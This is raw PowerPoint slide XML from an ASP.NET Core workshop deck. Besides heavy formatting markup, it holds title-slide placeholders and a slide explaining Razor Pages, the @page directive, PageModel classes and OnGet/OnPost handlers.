              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-342900" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>&lt; Engineer Name &gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5828884"/>
            <a:ext cx="2667000" cy="301752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:alpha val="88000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-342900" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Premier Field Engineer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.NET Core: Developing Cross-Platform Web Apps with ASP.NET Core – Workshop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PLUS </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11658600" y="5830408"/>
            <a:ext cx="533400" cy="301752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:alpha val="88000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-342900" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>v3.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2872435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Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 1: Razor View Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: Razor Pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2405173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R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>azor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pages - I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page-focused scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>@page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>makes the file into an MVC action (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>handles requests directly, without going through a controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PageModel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> class keeps code clean in different file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cshtml.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By convention, razor page file and class have the same name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Create.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Create.cshtml.cs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>@model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> represents the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PageModel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> class implemented.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code file helps to implement methods to handle request sync or async:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnPost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnGetAsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnPostAsync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnPost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7623878" y="5578640"/>
            <a:ext cx="2819400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generated HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="434255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0B7A8-A9CA-44FC-B12E-963E81F3C94E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Razor Pages - II</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
